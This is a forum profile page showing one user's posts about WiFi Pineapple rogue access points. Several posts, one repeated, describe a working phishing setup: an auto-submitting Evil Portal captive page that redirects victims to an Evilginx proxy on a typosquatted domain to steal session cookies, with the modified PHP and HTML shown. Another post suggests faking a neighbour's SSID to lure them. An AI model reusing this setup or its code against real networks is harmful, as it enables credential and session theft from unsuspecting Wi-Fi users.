Jump to content

Street

Active Members
  • Posts

    19
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Street's Achievements

  1. Have you got it to work yet? I haven't played with the pineapple in awhile. I did have another idea however. You can give the access point any name you want. So why not typo-squat? Like if you know your neighbors router is myATT123 set yours to myATT123-5G. Then they might think it's an upgrade.
  2. The pineapple forwards the user to an evilginx web server. https://github.com/kgretzky/evilginx2
  3. I created a custom Evil Portal landing page for the WiFi Pineapple. On joining the rouge access point Evil Portal opens up a Captive Portal. This is what normally is used by WiFi networks to register users before letting them onto the internet. You can phish for credentials this way usually with the Pineapple. However, I wanted to do something different. I wanted to send the users to another site after they register. By adding a line of javascript to the body tag in the evil portal index.html page, the javascript automatically triggered the form button on the page. Then I changed the code which refreshed the evil portal page after the form button was triggered to load the page I wanted. Finally I installed Evilginx on the new server. Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It's core runs on Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content, while intercepting traffic between client and server. Once that was up & running I squatted on another domain name. Replacing one letter of the name with a dash. It was something like www.mydom-in.com The website stole the cookies and allowed me to hack my own account. However, my domain name was seized by the courts recently. Even though I never hacked anyone but myself. I have been keeping all of this & my code secret but don't want my adventure to be lost. So here you go guys! I changed this in index.php: <BODY onload="document.forms['member_signup'].submit()"> <div style="text-align: center;"> <h1>Connecting to WiFi.</h1> <p>The SSID you are connected to is <?=getClientSSID($_SERVER['REMOTE_ADDR']);?></p> <p>Your host name is <?=getClientHostName($_SERVER['REMOTE_ADDR']);?></p> <p>Your MAC Address is <?=getClientMac($_SERVER['REMOTE_ADDR']);?></p> <p>Your internal IP address is <?=$_SERVER['REMOTE_ADDR'];?></p> <form method="POST" action="/captiveportal/index.php" name="member_signup"> <input type="hidden" name="target" value="<?=$destination?>"> <button type="submit">Authorize</button> </form> </div> </BODY> Change this in /www/captiveportal/Portal.php: /** * Where to redirect to on successful authorization. */ protected function redirect() { header('Location: https://www.google.com'); } /** * Override this to do something when the client is successfully authorized. * By default it just notifies the Web UI. */ protected function onSuccess() { header('Location: https://www.google.com'); }
  4. I created a custom Evil Portal landing page for the WiFi Pineapple. On joining the rouge access point Evil Portal opens up a Captive Portal. This is what normally is used by WiFi networks to register users before letting them onto the internet. You can phish for credentials this way usually with the Pineapple. However, I wanted to do something different. I wanted to send the users to another site after they register. By adding a line of javascript to the body tag in the evil portal index.html page, the javascript automatically triggered the form button on the page. Then I changed the code which refreshed the evil portal page after the form button was triggered to load the page I wanted. Finally I installed Evilginx on the new server. Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It's core runs on Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content, while intercepting traffic between client and server. Once that was up & running I squatted on another domain name. Replacing one letter of the name with a dash. It was something like www.mydom-in.com The website stole the cookies and allowed me to hack my own account. However, my domain name was seized by the courts recently. Even though I never hacked anyone but myself. I have been keeping all of this & my code secret but don't want my adventure to be lost. So here you go guys! I changed this in index.php: <BODY onload="document.forms['member_signup'].submit()"> <div style="text-align: center;"> <h1>Connecting to WiFi.</h1> <p>The SSID you are connected to is <?=getClientSSID($_SERVER['REMOTE_ADDR']);?></p> <p>Your host name is <?=getClientHostName($_SERVER['REMOTE_ADDR']);?></p> <p>Your MAC Address is <?=getClientMac($_SERVER['REMOTE_ADDR']);?></p> <p>Your internal IP address is <?=$_SERVER['REMOTE_ADDR'];?></p> <form method="POST" action="/captiveportal/index.php" name="member_signup"> <input type="hidden" name="target" value="<?=$destination?>"> <button type="submit">Authorize</button> </form> </div> </BODY> Change this in /www/captiveportal/Portal.php: /** * Where to redirect to on successful authorization. */ protected function redirect() { header('Location: https://www.google.com'); } /** * Override this to do something when the client is successfully authorized. * By default it just notifies the Web UI. */ protected function onSuccess() { header('Location: https://www.google.com'); }
  5. Evil Portal loads fine to authenticate users, however after a user authenticates they don't get sent to the captive portal on a reconnect. I have to manually delete their IP from the table. Is there a quick fix for this?
  6. Magician, I got this problem working now. You can contact me if you want and I'll help you through it!
  7. OK! I got this problem fixed / working now!
  8. I have been trying to create a custom Evil Portal landing page for the WiFi Pineapple. When users join my rouge access point Evil Portal opens up a Captive Portal. This is normally used by WiFi networks to register users before letting them onto the internet. You can phish for credentials this way usually with the Pineapple. However, I want to do something different. I want to send the users to another site after they register. Is this possible?
  9. I am having the exact same problem as thepineapple. It just started today, around the same time thepineapple posted.
  10. How can an evil portal attack work with two factor authentication?
  11. Can the WiFi Pineapple connect to AP's which are further away than typical WiFi card can connect to?
  12. It seems like I have to be in active mode to connect with clients and use the modules.
  13. So it turns out it was the filters and the thing is working now. Thanks!
  14. The WiFi Pineapple VII does a great job getting WiFi handshakes for sure, but I don't understand the difference between active and passive modes. It logs handshakes in passive mode okay. When I watch the access points in active mode the WiFi Pineapple creates duplicate access points, and I see clients connecting to them. I would like someone to explain to me what is happening in active mode and when I should use it. Thanks!
  15. I'm having the same problem with my WiFi Pineapple VII
×
×
  • Create New...